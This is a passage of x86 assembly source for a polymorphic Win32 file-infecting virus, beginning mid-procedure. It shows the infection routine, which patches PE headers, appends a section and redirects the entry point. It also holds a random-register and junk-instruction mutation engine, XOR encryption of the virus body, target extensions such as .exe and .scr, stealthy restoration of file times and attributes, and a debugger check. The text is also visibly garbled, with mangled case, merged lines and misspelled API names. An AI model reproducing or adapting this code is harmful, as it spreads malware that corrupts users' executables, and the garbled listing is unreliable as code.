Call [EBX DDSETENDOFFILE]; SET EOF
Set_time:
Lea Eax, [EBX WFD.WFD_FTLASTWRITETIME]
Push EAX
Lea Eax, [EBX WFD.WFD_FTLASTACCESSTIME]
Push EAX
Lea Eax, [EBX WFD.WFD_FTCREATIONTIME]
Push EAX
PUSH ESI
Call [EBX DDSETFILETIME]; Set Back File Time
Closefile:
Push [EBX HFILE]
Call [EBX DDCLOSEHANDLE]; Close File
Push [EBX DWTHREADID]
NCLF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
Popad
JMP n_closefile
NEURON_CLOSEFILE ENDP
; ------------------------------------------------- ------------------------------
NEURON_INFECTFILE PROC PASCAL DELTA_PARAM: DWORD
Delta Offset As Dendrit
n_infectfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
@Seh_setupframe; setup SEH FRAME
XOR ESI, ESI
PUSH ESI
Lea Edi, [EBX WFD.WFD_SZFILENAME]
Push EDI
Call [EBX DDSETFILEATTRIBUTESA]; Blank File Attributes
Test Eax, EAX
JE END_INFECTFILE
MOV EAX, [EBX WFD.WFD_NFILESZELOW]
Sub Eax, Start - Virus_end
MOV [EBX NOPENFILE_SIZE], EAX; DendritMov [EBX NOF_SYNAPSE], OFFSET PFNEURON_INFECTFILE; SYNAPSE
Push [EBX PFNEURON_OPENFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
MOV ECX, [EBX LPFILE]
Test ECX, ECX
JE ERR_INFECTFILE
Lea Eax, [EBX SZGETMODULEHANDLEA]
Lea Edx, [EBX SZKERNEL32]
Call getProcadDressit; imports getModuleHandlea?
Test Eax, EAX
JNE Store
Lea Eax, [EBX SZGETMODULEHANDLEW]; NOPE, MUST IMPORT Unicode
Call getProcaddressit; Version of That
Test Eax, EAX
JE ERR_INFECTFILE
MOV [EBX GMHW], EAX
XOR EAX, EAX
STORE: MOV [EBX GMHA], EAX
Push ECX
Add ECX, [ECX.MZ_LFANEW]
MOV EDX, ECX
x = image_sizeof_section_header
Movzx ESI, Word Ptr [Edx.nt_FileHeader.fh_sizeOfoptionalHeader]
Lea ESI, [EDX.NT_OPTIONALHEADER ESI]
Movzx eax, word ptr [edx.nt_fileHeader.fh_numberofsections]]
Test Eax, EAX
JE ERR_INFECTFILE
Imul Eax, X
Add ESI, ESI
IN Al, 40h; Select How To Infect File
And Al, 2
Je nextwayofinfection
Push [ESI.SH_SIZEOFRAWDATA - X]
Lea Edi, [ESI.SH_VIRTUALSIZE - X]
Sub DWORD PTR [EDI], START - Virtual_END; New Virtual Size
MOV EAX, [EDI]
Push Edx
MOV ECX, [edx.nt_optionalheader.oh_filealignment]
CDQ
Div ECX
INC EAX
Mul ECX
MOV [ESI.SH_SIZEOFRAWDATA - X], Eax; New SizeofrawData
MOV ECX, EAX
POP EDX
Mov Eax, [EBX EntryPoint]
Push [edx.nt_optionalheader.oh_addressofentrypoint]
POP [EBX ENTRYPOINT]
POP EDI
Push EAX
SUB ECX, EDI
Add [edx.nt_optionalheader.oh_sizeofimage], ECX; New SizeOfImage
OR [ESI.SH_CHARACTERISTICS.HIW.HIB - X], 0E0H; Change Flags
Mov Eax, [ESI.SH_POINTERTORAWDATA - X]
Add Eax, EDI
MOV ECX, [EBX WFD.WFD_NFILESZELOW]
Add Edi, ECX
Sub EDI, EAX
Mov ESI, [ESI.SH_VIRTUALADDRESS - X] Add ESI, EDI
MOV [edx.nt_optionalheader.oh_addressofentryPoint], ESI; New EP
POP EAX
Copy_virus:
POP EDI
MOV BYTE PTR [EDI.MZ_RES2], 1; SET "already infected" Mark
Add Edi, ECX
Pushad; Poly Engine Starts Here ...
Rep_1: Call get_reg; load random register
MOV DL, Al
Add Al, 58H; Create Pop Reg
MOV BYTE PTR [EBX @ 1], Al; Store IT
Lea EDI, [EBX @ 2 1]; and APLY Registry Changes
Call Mask_it; To All Needed
Lea EDI, [EBX @ 3]; instructions
Call mask_it; ...
REP_2: Call get_reg; get random register
CMP Al, DL; Mustnt Be Previous Register
JE rep_2
MOV DH, Al
XCHG DL, DH
Add Al, 0B8H; CREATE MOV INSTRUCTION
MOV BYTE PTR [EBX @ 4], Al; Store IT
Lea EDI, [EBX @ 5]; and APLY Changes
Call mask_it
Push EAX
IN Al, 40h
And Al, 1
JE _TEST_
MOV Al, 0BH; or REG, REG
JMP _WRITE
_Test_: MOV Al, 85H; Test Reg, REG
_WRITE: MOV BYTE PTR [EBX @ 6-1], Al; Store IT
POP EAX
Lea Edi, [EBX @ 6]
MOV Al, [EDI]
And Al, 11000000B
Add Al, DL
Ror Al, 3
Add Al, DL
ROL Al, 3
Stosb
REP_3: Call get_reg; get random register
CMP Al, DL; Mustnt Be Previous Register
JE rep_3
CMP Al, DH
JE rep_3
CMP Al, 101b; Mustnt Be EBP
JE Rep_3; (Due to INSTR. Incompatibility)
MOV DL, Al
Lea EDI, [EBX @ 3]
MOV Al, [EDI]
And Al, 11000111B
Ror Al, 3
Add Al, DL
ROL Al, 3
Stosb
Lea EDI, [EBX @ 7]
Call mask_it
Lea Edi, [EBX @ 8]
Call mask_it
LEA ESI, [EBX JUNX]
GEN_J: LODSD; JUNK INSTRUCTIONS generator
XCHG EAX, ECX
JECXZ END_MUTATE
Mov Edi, ECX
Add Edi, EBX
XOR EAX, EAX
IN Al, 40h
And Al, 1
JE _2 & 1_
PUSH ESI
LEA ESI, [EBX JUNX3]
IN Al, 40h
And Al, Num_Junx3-1Add ESI, EAX
Movsb
Movsb
IN Al, 40h
Stosb
JMP _gen_j
_2 & 1_: Push ESI
IN Al, 40h
And Al, 1
JE Twofirst
Call one_byte
Call TWO_BYTE
JMP _gen_j
TWOFIRST:
Call TWO_BYTE
Call one_byte
_Gen_J: POP ESI
JMP Gen_J
END_MUTATE:
Popad
Push EAX
In Al, 40h; Create 32bit Key
MOV AH, Al
IN Al, 40h
SHL EAX, 16
IN Al, 40h
MOV AH, Al
IN Al, 40h
MOV DWORD PTR [EBX Key], EAX; Store IT
Push EDI
MOV EDX, (Virus_end-Start 3) / 4; Copy Virus Body To INTERNAL
Lea ESI, [EBX START]; BUFFER
MOV ECX, EDX
Lea EDI, [EBX Buffer]
REP MOVSD
XOR ECX, ECX
Lea ESI, [EBX BUFFER - START Encrypted]
Crypt: xor [ESI], EAX; Encrypt Virus Body
Add ESI, 4
Inc ECX
CMP ECX, (Virus_end-Encrypted 3) / 4
JNE CRYPT
POP EDI
POP EAX
Lea ESI, [EBX BUFFER]
MOV ECX, EDX
INC DWORD PTR [EBX GenerationCount]; Increment Generation Count
Rep Movsd; COPY VIRUS
MOV [EBX ENTRYPOINT], EAX; Restore VariableAfter
MOV Al, 3; Copy Stage
JMP IF_n
Err_INFECTFILE:
MOV Al, 4
MOV [EBX NCLOSEFILE_MODE], AL; Dendrit
IF_N: MOV [EBX NCLF_SYNAPSE], Offset Pfneuron_infectFile; Synapse
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
End_infectfile:
Push [EBX WFD.WFD_DWFILEATTRIBUTES]]
Lea ESI, [EBX WFD.WFD_SZFILENAME]
PUSH ESI
Call [EBX DDSETFILEATTRIBUTESA]; SET Back File Attributes
END_IF: Push [EBX DWTHREADID]
Nif_synapse = dWord PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
JMP N_INFECTFILE
Nextwayofinfection:; Create New Section
MOV EDI, EDX
Inc Word Ptr [edi.nt_fileheader.fh_numberofsections]
Mov Eax, [ESI.SH_VIRTUALADDRESS - X]
Add Eax, [ESI.SH_VIRTUALSIZE - X] MOV ECX, [Edi.nt_OptionalHeader.oh_sectionalignment]
CDQ
Div ECX
Test EDX, EDX
JE next_1
INC EAX
Next_1: MUL ECX
MOV [EBX S_RVA], EAX; New RVA
MOV ECX, [EBX EntryPoint]
Push ECX
Push [edi.nt_optionalheader.oh_addressofentrypoint]
POP [EBX ENTRYPOINT]
MOV [edi.nt_optionalheader.oh_addressofentryPoint], EAX; New EP
MOV ECX, [edi.nt_optionalheader.oh_filealignment]
MOV EAX, Virtual_END - START
Div ECX
INC EAX
Mul ECX
MOV [EBX S_RAWSIZE], EAX; New SizeOfrawData
Add [edi.nt_optionalheader.oh_sizeofimage], EAX
New SizeOfImageBase
MOV ECX, [EBX WFD.WFD_NFILESZELOW]
MOV [EBX S_RAWPTR], ECX; New PointertorawData
Push ECX
Mov EDI, ESI
Lea ESI, [EBX New_SECTION]
MOV ECX, (image_sizeof_section_header 3) / 4
Rep Movsd; Copy Section
POP ECX
POP EAX
JMP COPY_VIRUS; and COPY VIRUS BODY
Ni_seh: @seh_removeframe; Remove SEH FRAME
Popad
JMP END_IF
NEURON_INFECTFILE ENDP
; ------------------------------------------------- ------------------------------
One_byte:
Lea ESI, [EBX JUNX1]
IN Al, 40h
And Al, Num_Junx1-1
Add ESI, ESI
Movsb
RET
TWO_BYTE:
Lea ESI, [EBX JUNX2]
IN Al, 40h
And Al, Num_Junx2-1
Add ESI, ESI
Movsb
IN Al, 40h
And Al, 7
Add Al, 11000000B
Stosb
RET
GET_REG:
IN Al, 40h
And Al, 7
JE get_reg
CMP AL, 4
JE get_reg
RET
Mask_it:
MOV Al, [EDI]
And Al, 11111000B
Add Al, DL
Stosb
RET
; ------------------------------------------------- ------------------------------
NEURON_ADDRESSES: DD Offset Neuron_main
DD offset neuron_debugger
DD offset neuron_findfile
DD Offset Neuron_checkfile
DD offset neuron_openfile
DD Offset Neuron_Closefile
DD Offset Neuron_infectfile
Num_of_neurons = (Byte Ptr $ - Offset Neuron_addresses / 4JUNX1: NOP
Dec EAX
CMC
INC EAX
CLC
CWDE
STC
Lahf
Num_junx1 = 8
Junx2: DB 8bh; MOV ..., ...
DB 03H; Add ..., ...
DB 13h; adc ..., ...
DB 2DH; SUB ..., ...
DB 1bh; sbb ..., ...
DB 0bh; or ..., ...
DB 33h; xor ..., ...
DB 23h; and ..., ..., ...
DB 33h; test ..., ...
Num_junx2 = 9
Junx3: DB 0C1H, 0C0H; ROL Eax, ...
DB 0C1H, 0E0H; SHL EAX, ...
DB 0C1H, 0C8H; Ror Eax, ...
DB 0C1H, 0E8H; SHR EAX, ...
DB 0C1H, 0D0H; RCL EAX, ...
DB 0C1H, 0F8H; Sar Eax, ...
DB 0C1H, 0D8H; RCR EAX, ...
Num_junx3 = 7
Junx: IRP NUM, <1, 2, 3, 4, 5, 6, 7, 8, 9>
DD Offset @ J & Num
ENDM
DD 0
GenerationCount DD?
EntryPoint DD Offset EXIXTPROCESS - 400000H
Szexe DB '* .exe', 0
SZSCR DB '* .SCR', 0
SZBAK DB '* .bak', 0
SZDAT DB '* .dat', 0
SZSFX DB '* .sfx', 0
NUM_OF_EXTS = 5
Dotdot DB '..', 0
DTAVTBAV DB 'Anti-vir.dat', 0
String_subs:; String Substitutes
DB 'File', 0
DB 'get', 0
DB 'SET', 0
DB 'Module', 0
DB 'Handle', 0
DB 'Create', 0
DB 'Find', 0
DB 'close', 0
DB 'ViewOf', 0
DB 'CurrentDirectorya', 0
DB 'Fiber', 0
DB 'Thread', 0
DB 'delete', 0
DB 'Library', 0
NEW_SECTION:
S_name db '.mdata', 0, 0
S_VSIZE DD VIRTUAL_END - START
S_RVA DD 0
S_Rawsize DD 0
S_Rawptr DD 0
DD 0, 0, 0
S_Flags DD 0e0000000H
Virus_end:
Strings:
SZKERNEL32 DB 'KERNEL32', 0
Szkernel32w dw 'k', 'e', 'r', 'n', 'e', 'L', '3', '2', 0
Szuser32 DB 'USER32', 0
SzgetModuleHandlea DB 'getModuleHandlea', 0SZgetModuleHandlew DB 'getModuleHandlew', 0
Szapis:
SzcreateThread DB 'CreateThread', 0
SzwaitforsingleObject DB 'WaitforsingleObject', 0
SzcloseHandle DB 'CloseHandle', 0
SZConvertthreadTofiber DB 'ConvertThreadTofiber', 0
SzcreateFiber DB 'CreateFiber', 0
Szswitchtofiber DB 'Switchtofiber', 0
SZDELETEFIBER DB 'DELETEFIBER', 0
SZGETVERSION DB 'GETVERSION', 0
SZFindFirstFilea DB 'Findfirstfilea', 0
SZFINDNEXTFILEA DB 'FINDNEXTFILEA', 0
SZFindClose DB 'FindClose', 0
SzcreateFilea DB 'CreateFilea', 0
SzcreateFilemappinga DB 'CreateFilemappinga', 0
SzmapViewoffile DB 'MapViewOffile', 0
SzunmapViewoffile db 'unmapviewoffile', 0
SzsetFileAttributesa DB 'setFileAttributesa', 0
SZSetFilePointer DB 'setFilePointer', 0
SZSETENDOFFILE DB 'STENDOFFILE', 0
SZSETFILETIME DB 'SETFILETIME', 0
SzgetCurrentDirectorya DB 'getcurrentdirectorya', 0
SzsetCurrentDirectorya DB 'setcurrentdirectorya', 0
SZDELETEFILEA DB 'Deletefilea', 0
SzloadLibrarya DB 'LoadLibrarya', 0
SZFREELIBRARYA DB 'FREELIBRARY', 0
SZISDEBUGERPRESENT DB 'IsDebuggerPresent', 0
DB 0FFH
DDAPIS:
DDCREATTHREAD DD?
DDWAITFORSINGLEOBJECT DD?
DDCLOSEHANDLE DD?
DDCONVERTTHREADTOFIBER DD?
DDCREATEFIBER DD?
DDSWITCHTOFIBER DD?
DDDELETEFIBER DD?
DDGETVERSION DD?
DDFINDFIRSTFILEA DD?
DDFINDNEXTFILEA DD?
DDFINDCLOSE DD?
DDCREATEFILEA DD?
DDCREATEFILEMAPPINGA DD?
DDMAPVIEWOFFILE DD?
DDUNMAPVIEWOFFILE DD?
DDSETFILEATTRIBUTESA DD?
DDSETFILEPOINTER DD?
DDSETENDOFFILE DD? DDSETFILETIME DD?
DDGETCURRENTDIRECTORYA DD?
DDSETCURRENTDIRECTORYA DD?
DDDDELETEFILEA DD?
DDLOADLIBRARYA DD?
DDFREELIBRARYA DD?
DDISDEBUGGERPRESENT DD?
DWTHREADID DD?
Fiber_Addresses:
PFMAIN DD?
PFNEURON_MAIN DD?
PFNEURON_DEBUGGER DD?
PFNEURON_FINDFILE DD?
PFNEURON_CHECKFILE DD?
PFNEURON_OPENFILE DD?
PFNEURON_CLOSEFILE DD?
PFNEURON_INFECTFILE DD?
HFILE DD?
HMAPFILE DD?
LPFILE DD?
SearchHandle DD?
Curdir DB MAX_PATH DUP (?)
WFD WIN32_FIND_DATA?
Buffer DB Virus_END - START 1 DUP (?)
Virtual_end:
_GetModuleHandlea DD Offset getModuleHandlea
_GetModuleHandlew DD Offset getModuleHandlew
ENDS
End Start
